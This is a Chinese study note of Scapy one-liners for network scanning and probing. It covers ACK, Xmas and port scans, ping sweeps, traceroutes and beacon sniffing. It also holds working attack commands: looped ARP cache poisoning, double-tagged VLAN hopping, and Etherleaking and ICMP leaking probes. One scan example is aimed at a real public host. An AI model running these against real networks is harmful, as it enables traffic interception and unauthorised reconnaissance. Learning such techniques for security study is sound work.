scapy学习笔记

1、ACK Scan

>>>ans,unans=sr(IP(dst="www.baidu.com")/TCP(dport=[80,666],flags="A")

扫描后，若要找出未过虑的端口：

for s,r in ans:
    if s[TCP].dport==r[TCP].sport:
        print str(s[TCP].dport)+"is  unfiltered."

过滤过的：

for s in unans:
    print str(s[TCP].dport)+"is filtered."

2、Xmas Scan

>>>ans,unans=sr(IP(dst="192.168.1.1")/TCP(dport=666,flags="FPU"))

RST表示端口关闭。

3、IP Scan

>>> ans,unans=sr(IP(dst="192.168.1.1",proto=(0,255))/"SCAPY",retry=2)

4、ARP ping

>>> ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)

结果显示：

>>> ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") )

5、ICMP ping

>>> ans,unans=sr(IP(dst="192.168.1.1-254")/ICMP())

结果显示用下面的语句：

>>> ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") )

6、TCP ping

>>> ans,unans=sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )

结果显示用下面的语句：

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") )

7、UDP ping

>>> ans,unans=sr( IP(dst="192.168.*.1-10")/UDP(dport=0) )

结果：

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") )

8、ARP cache poisoning

>>> send( Ether(dst=clientMAC)/ARP(op="who-has", psrc=gateway, pdst=client),inter=RandNum(10,40), loop=1 )

9、TCP Port Scanning

>>> res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )

10、IKE Scanning

>>> res,unans = sr( IP(dst="192.168.1.*")/UDP()/ISAKMP(init_cookie=RandString(8), exch_type="identity prot.")/ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()))
Visualizing the results in a list:
>>> res.nsummary(prn=lambda (s,r): r.src, lfilter=lambda (s,r): r.haslayer(ISAKMP) )

11、Advanced traceroute

（1）TCP SYN traceroute

>>> ans,unans=sr(IP(dst="4.2.2.1",ttl=(1,10))/TCP(dport=53,flags="S"))
Results would be:
>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))
192.168.1.1          time-exceeded
68.86.90.162        time-exceeded
4.79.43.134          time-exceeded
4.79.43.133          time-exceeded
4.68.18.126          time-exceeded
4.68.123.38          time-exceeded
4.2.2.1                  SA

（2）UDP traceroute

>>> res,unans = sr(IP(dst="target", ttl=(1,20))/UDP()/DNS(qd=DNSQR(qname="test.com"))
We can visualize the results as a list of routers:
>>> res.make_table(lambda (s,r): (s.dst, s.ttl, r.src))

（3）DNS traceroute

>>> ans,unans=traceroute("4.2.2.1",l4=UDP(sport=RandShort())/DNS(qd=DNSQR(qname="thesprawl.org")))
Begin emission:
..*....******...******.***...****Finished to send 30 packets.
*****...***...............................
Received 75 packets, got 28 answers, remaining 2 packets
4.2.2.1:udp53
1 192.168.1.1 11
4 68.86.90.162 11
5 4.79.43.134 11
6 4.79.43.133 11
7 4.68.18.62 11
8 4.68.123.6 11
9 4.2.2.1

（4）Etherleaking

>>> sr1(IP(dst="172.16.1.232")/ICMP())
<IP src=172.16.1.232 proto=1 [...] |<ICMP code=0 type=0 [...]|
<Padding load=’0O\x02\x01\x00\x04\x06public\xa2B\x02\x02\x1e’ |>>>

（5）ICMP leaking

>>> sr1(IP(dst="172.16.1.1", options="\x02")/ICMP())
<IP src=172.16.1.1 [...] |<ICMP code=0 type=12 [...] |
<IPerror src=172.16.1.24 options=’\x02\x00\x00\x00’ [...] |
<ICMPerror code=0 type=8 id=0x0 seq=0x0 chksum=0xf7ff |
<Padding load=’\x00[...]\x00\x1d.\x00V\x1f\xaf\xd9\xd4;\xca’ |>>>>>

（6）VLAN hopping

>>> sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=7)/IP(dst=target)/ICMP())

（7）Wireless sniffing

>>> sniff(iface="ath0",prn=lambda x:x.sprintf("{Dot11Beacon:%Dot11.addr3%\t%Dot11Beacon.info%\t%PrismHeader.channel%\tDot11Beacon.cap%}"))
The above command will produce output similar to the one below:
00:00:00:01:02:03 netgear  6L ESS+privacy+PBCC
11:22:33:44:55:66 wireless_100 6L short-slot+ESS+privacy
44:55:66:00:11:22 linksys 6L  short-slot+ESS+privacy
12:34:56:78:90:12 NETGEAR 6L  short-slot+ESS+privacy+short-preamble